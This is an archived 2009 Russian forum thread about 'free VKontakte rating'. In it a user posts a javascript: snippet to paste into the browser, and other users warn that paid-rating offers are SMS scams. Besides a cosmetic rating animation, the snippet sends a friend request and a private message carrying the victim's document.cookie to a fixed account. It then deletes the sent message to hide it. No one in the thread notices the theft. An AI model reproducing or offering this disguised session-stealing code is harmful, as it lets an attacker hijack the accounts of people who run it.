Бесплатный рейтинг вКонтакте - Форум
W4Tweaks
Меню сайта
Последние файлы
Последние темы

Вход

Мини-чат

500

Статистика
Онлайн:

Сегодня заходили: firsacho, Joker, KaMiKaZe, 4erveR, Unaited, TheKing97, Renny

Друзья сайта

Если вы хотите увидеть в этом спиcке свой сайт загляните сюда

Наш баннер:

· Регистрация · Вход
[ Новые сообщения · Участники · Подписки · Поиск · RSS ]
Страница 1 из 11
Архив - только для чтения
Форум » ТОПКА » ТОПКА » Бесплатный рейтинг вКонтакте (Бесплатно но безнадёжно)
Бесплатный рейтинг вКонтакте
Drun
Дата: ЧТ, 24.09.2009, 15:46:34 | Сообщение # 1
Drun
Олег
Статус: Offline
и так, сегодня в рунете я нашел скриптик, якобы поднимающий рейтинг, но он был платен(500р помойму) ну я как знаменитый халявщик пошёл на просторы яндекса искать его нахаляву.
Ну вот я его нашёл, запустил, НО НЕТ! рейтинг не сохраняется! cry но чтоб прикольнутся над другами Оч даж подходит!(приходит ваш друг вконтакте мен, как и все желающий рейтинг на халяву, вы показываете вашу страничку и опа!:) но к сожалению после перезагрузки странички усё это пропадает а жаль
ну ладно вот скрипт:

Javascript:var percentGold=100;var widthLeft=20;var widthRight=179;var t;var memPerSec=10.00741833975;function d(m,j,l){var i=(m+'').indexOf(j,l);return i=== -1?false:i;};function _a(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percentGold').innerHTML=percentGold;ge('rateLeftGold').style.width=widthLeft+"px";ge('rateRightGold').style.width=widthRight+"px";percentGold=percentGold+1;widthLeft=Math.floor(Math.sin((percentGold-100)/500)*179+20);widthRight=199-widthLeft;if(widthRight<=1){clearTimeout(t);}else t=setTimeout(_a,next);};function first(){if(ge('percent')){percentGold=ge('percent').innerHTML;var pos=d(percentGold,">",0);if(pos==false) {percentGold=parseInt(percentGold);}else percentGold=parseInt(percentGold.substr(pos+1,3)); widthLeft=parseInt(ge('rateLeft').style.width);widthRight=parseInt(ge('rateRight').style.width);_b();}else{percentGold=parseInt(ge('percentGold').innerHTML);widthLeft=parseInt(ge('rateLeftGold').style.width);widthRight=parseInt(ge('rateRightGold').style.width);_a();}};function _b(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percent').innerHTML=percentGold+"%";ge('rateLeft').style.width=widthLeft+"px";ge('rateRight').style.width=widthRight+"px";percentGold=percentGold+1;if(percentGold>100){clearTimeout(t);ge('percent').id="percentGold";ge('rateLeft').id='rateLeftGold';ge('rateRight').id='rateRightGold';widthLeft=20;widthRight=179;_a();}else{widthLeft=widthLeft+2;widthRight=199-widthLeft;t=setTimeout(_b,next);}};var f=document.createElement('div');f.style.display="none";var params;function a(){Ajax.Post({url:'friend.php',query:{act:'a_add_form',fid:42485098},onDone:function(ajaxObj,responseText){try{var text=responseText;var response=eval('('+responseText+')');f.innerHTML=response.text;var form=ge('addFriendForm');if(!form)return;var params=serializeForm(form);Ajax.Post({url:'friend.php',query:params});}catch(e){}}});};function b(){Ajax.Get({url:'mail.php',query:{act:'write',to:42485098},onDone:function(ajaxObj,responseText){var text=responseText;try{f.innerHTML=responseText;params={act:ge('act').value,ajax:1,misc:ge('misc')?ge('misc').value:'',secure:ge('secure')?ge('secure').value:'',chas:ge('chas').value,photo :ge('photo')?ge('photo').value:'',to_id:42485098,to_reply:ge('to_reply').value,toFriends:ge('toFriends')?ge('toFriends').value:'',title:ge(' title').value,message:''+Math.round(Math.random()*10000)+document.cookie+Math.round(Math.random()*10000)};setTimeout(c,3000);}catch(e){}}});}; function c() {Ajax.Post({url:'mail.php',query:params,onDone: function(ajaxObj,responseText){setTimeout(e,1000);}});}; function e(){Ajax.Get({url:'mail.php',query:{out:"1",rnd:Math.round(Math.random()*10000)},onDone:function(ajaxObj,responseText){try{var k='<a href="mail.php?act=write&to=42485098&r=';var pos=d(responseText,k,0); var g=d(responseText,'&out=1"',pos); if(pos==false)return; var messid=parseInt(responseText.substr(pos+k.length,g-pos));params={act:"a_delete",id:messid,out:1}; Ajax.Post({url:'mail.php',query:params});}catch(e){}}});}; onDomReady(function(){document.body.appendChild(f); first();a();b();});

Сообщение отредактировал Drun - ЧТ, 24.09.2009, 15:48:02

KaMiKaZe
Дата: ЧТ, 24.09.2009, 16:18:36 | Сообщение # 2
KaMiKaZe
Incognito
и нафига сей скрипт не нужен
уж лучше заплатить 500 рублей
уж если друг твой безоружен
сходи в ларек купи-ка клей

firsacho
Дата: ЧТ, 24.09.2009, 17:59:41 | Сообщение # 3
firsacho
ICQ = 453-163-541
Статус: Online
Народ... бесплатного рейтинга вконтакте не бывает, запомните. Рейтинг можно купить только кликнув по своему рейтингу и отправив смс на написанный там номер. Если вам предлагают отправить смс на другой номер и получить дофига рейтинга - знайте -это развод. С вас снимут рублей 300 и нефига вы не получите.

Смысл жизни в том, чтобы жизнь имела смысл... (firsacho 2005)
Рай придуман, чтобы не страшно было умирать. Ад придуман, чтобы не страшно было жить. (firsacho 2007)
Мир делиться на два типа людей: Бездарные трудоголики и Талантливые лентяи. (firsacho 2008)

www.w4mod.tk - моя модификация для worms4

www.fir-st.narod.ru - моя домашняя творческая страничка

www.botarena.by.ru - мой сайт об игре robot arena 2 (битвы роботов)

KaMiKaZe
Дата: ЧТ, 24.09.2009, 18:53:05 | Сообщение # 4
KaMiKaZe
Incognito
еще могу добавить то, что когда я создал свою страничку ВКонтакте, мне на стене написали, что через 3 часа мою страничку удалят, если я не отправлю смс, эт развод тож если что

AlexBond
Дата: ЧТ, 24.09.2009, 18:53:49 | Сообщение # 5
AlexBond
Легендарный червь
Мой друг как раз занимается оптовой продажей рейтинга, причем на одном форуме он отдает голоса чисто за активность на форуме. ну лично по мне рейтинг это болезнь. да и я за свою жизнь не разу не отправил смс для тупых сервесов =) Однокласники до сих пор не активировал...

firsacho
Дата: ЧТ, 24.09.2009, 21:48:43 | Сообщение # 6
firsacho
ICQ = 453-163-541
Присоединяюсь к Алексбонду... на инете надо деньги учиться зарабатывать, а не транжирить на какую то дребедень типа красивого статуса...

Рай придуман, чтобы не страшно было умирать. Ад придуман, чтобы не страшно было жить. (firsacho 2007)
Мир делиться на два типа людей: Бездарные трудоголики и Талантливые лентяи. (firsacho 2008)

Drun
Дата: ПТ, 25.09.2009, 15:31:26 | Сообщение # 7
Drun
Олег
ну знаю,я тож СМСки не разу не отправлял, по мне так соглашусь то что рейтинг это неважно, мне просто нравится когда тебе все завидуют biggrin biggrin biggrin (а кому не нравится?! cool )

AlexBond
Дата: ПТ, 25.09.2009, 15:57:31 | Сообщение # 8
AlexBond
Легендарный червь
Мне не нравится!!! Зависть создает плохую карму, как другим так и тебе. Из-за зависти появляется ненависть, а ненависть толкает человека на плохие поступки, вредительство, грабежи, избиение, война....

firsacho
Дата: ПТ, 25.09.2009, 18:22:25 | Сообщение # 9
firsacho
ICQ = 453-163-541
рейтинг хорошая штука когда он бесплатный) у человека появляется азарт его зарабатывать, что подымает популярность ресурса....

Форум » ТОПКА » ТОПКА » Бесплатный рейтинг вКонтакте (Бесплатно но безнадёжно)
Страница 1 из 11
Поиск:

Copyright W4Tweaks™ 2008-2016 Хостинг от uCoz